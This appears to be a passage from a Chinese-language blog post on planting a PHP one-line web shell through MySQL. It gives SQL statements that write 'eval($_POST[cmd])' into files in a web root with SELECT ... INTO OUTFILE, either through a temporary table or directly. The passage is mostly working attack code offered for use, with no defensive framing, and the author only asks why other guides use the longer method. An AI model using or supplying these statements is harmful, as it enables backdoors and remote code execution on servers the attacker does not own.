Drop TABLE IF EXISTS temp; //如果存在temp就删掉
Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
Insert INTO temp (cmd) VALUES(‘<? php eval($_POST[cmd]);?>‘); //把一句话木马插入到temp表
Select cmd from temp into out file ‘d:/wwwroot/1.php‘; //查询temp表中的一句话并把结果导入到eval.php
Drop TABLE IF EXISTS temp; //删除temp
- 方法2:直接select 查询导出一句话
还有一个思路,就是通过select ‘一句话‘ into outfile ‘网站物理路径‘ 即可,具体操作语句如下:
select ‘<? php eval($_POST[cmd]);?>‘ into outfile ‘d:/phpstudy/wwww/1.php‘;
这样做简洁明了,没那么多废话。不知道网上的方法要操作那么复杂(建表-插入数据-最后从表中导出数据),真心复杂!!!
如果谁知道,网上这样操作的原因,请给我留言分享下!!!
